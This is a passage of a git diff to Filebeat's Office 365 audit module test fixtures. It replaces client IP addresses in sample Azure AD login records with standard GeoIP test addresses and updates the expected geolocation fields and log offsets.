"ResultStatus": "Succeeded", "IntraSystemId": "1dfdb693-18a1-4cff-aa3e-61feaa356100", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "f67568b1-64c4-4165-bdd9-16a5b9142eef"}
+{"InterSystemsId": "e2565aaf-91b0-4ccd-8810-743123eb7383", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:29:02", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "21166e08-6589-4c2d-a325-c97ba45f2200", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "a8114a24-d342-4689-b75e-51e6386763de"}
+{"InterSystemsId": "ede626b9-2035-4d02-8330-201c4ae82af6", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:25:21", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "98612804-9aa6-40a4-b72a-808bc7742000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "1eaf9c65-8c67-4cd9-9277-771589113752"}
+{"InterSystemsId": "fc5c6c90-a6ba-486c-b685-8d67c529d3aa", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:39", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "6e184f6f-887b-4410-b24d-723031366000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "3c439e46-d454-4767-9320-1e75540821b7"}
diff --git a/x-pack/filebeat/module/o365/audit/test/15-azuread-sts-logon.log-expected.json b/x-pack/filebeat/module/o365/audit/test/15-azuread-sts-logon.log-expected.json
index 986c8a23ca9a..33ea987e8b64 100644
--- a/x-pack/filebeat/module/o365/audit/test/15-azuread-sts-logon.log-expected.json
+++ b/x-pack/filebeat/module/o365/audit/test/15-azuread-sts-logon.log-expected.json
@@ -1,8 +1,8 @@
 [
     {
         "@timestamp": "2020-02-10T15:13:13.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -37,10 +37,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-10T15:13:13",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -69,20 +69,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -100,8 +98,8 @@
     },
     {
         "@timestamp": "2020-02-12T10:53:24.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -119,7 +117,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 1450,
+        "log.offset": 1448,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -136,10 +134,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "79.159.10.151",
+        "o365.audit.ActorIpAddress": "216.160.83.57",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CreationTime": "2020-02-12T10:53:24",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -168,20 +166,19 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -199,8 +196,8 @@
     },
     {
         "@timestamp": "2020-02-09T15:29:01.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -218,7 +215,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 2901,
+        "log.offset": 2899,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -235,10 +232,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-09T15:29:01",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -267,20 +264,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -298,8 +293,8 @@
     },
     {
         "@timestamp": "2020-02-12T10:52:06.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -317,7 +312,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 4293,
+        "log.offset": 4289,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -334,10 +329,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "79.159.10.151",
+        "o365.audit.ActorIpAddress": "216.160.83.57",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CreationTime": "2020-02-12T10:52:06",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -366,20 +361,19 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -397,8 +391,8 @@
     },
     {
         "@timestamp": "2020-02-12T10:53:22.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -416,7 +410,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 5744,
+        "log.offset": 5740,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -433,10 +427,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "79.159.10.151",
+        "o365.audit.ActorIpAddress": "216.160.83.57",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CreationTime": "2020-02-12T10:53:22",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -465,20 +459,19 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -496,8 +489,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:43:23.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -515,7 +508,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 7137,
+        "log.offset": 7133,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -532,10 +525,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "213.97.47.133",
+        "o365.audit.ActorIpAddress": "81.2.69.143",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CreationTime": "2020-02-07T16:43:23",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -564,20 +557,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -595,8 +586,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:43:41.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -614,7 +605,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 8587,
+        "log.offset": 8579,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -631,10 +622,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "213.97.47.133",
+        "o365.audit.ActorIpAddress": "81.2.69.143",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CreationTime": "2020-02-07T16:43:41",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -663,20 +654,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -694,8 +683,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:43:22.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -713,7 +702,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 10037,
+        "log.offset": 10025,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -730,10 +719,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "213.97.47.133",
+        "o365.audit.ActorIpAddress": "81.2.69.143",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CreationTime": "2020-02-07T16:43:22",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -762,20 +751,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -793,8 +780,8 @@
     },
     {
         "@timestamp": "2020-02-12T10:52:05.000Z",
-        "client.address": "79.159.10.151",
-        "client.ip": "79.159.10.151",
+        "client.address": "216.160.83.57",
+        "client.ip": "216.160.83.57",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -812,7 +799,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 11429,
+        "log.offset": 11413,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -829,10 +816,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "79.159.10.151",
+        "o365.audit.ActorIpAddress": "216.160.83.57",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.10.151",
+        "o365.audit.ClientIP": "216.160.83.57",
         "o365.audit.CreationTime": "2020-02-12T10:52:05",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "False",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -861,20 +848,19 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "79.159.10.151",
+        "related.ip": "216.160.83.57",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.10.151",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "tags": [
             "forwarded"
         ],
@@ -892,8 +878,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:43:45.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -911,7 +897,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 12822,
+        "log.offset": 12806,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -928,10 +914,10 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "213.97.47.133",
+        "o365.audit.ActorIpAddress": "81.2.69.143",
         "o365.audit.ApplicationId": "5e3ce6c0-2b1f-4285-8d4b-75ee78787346",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CreationTime": "2020-02-07T16:43:45",
         "o365.audit.ExtendedProperties.KeepMeSignedIn": "True",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -960,20 +946,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
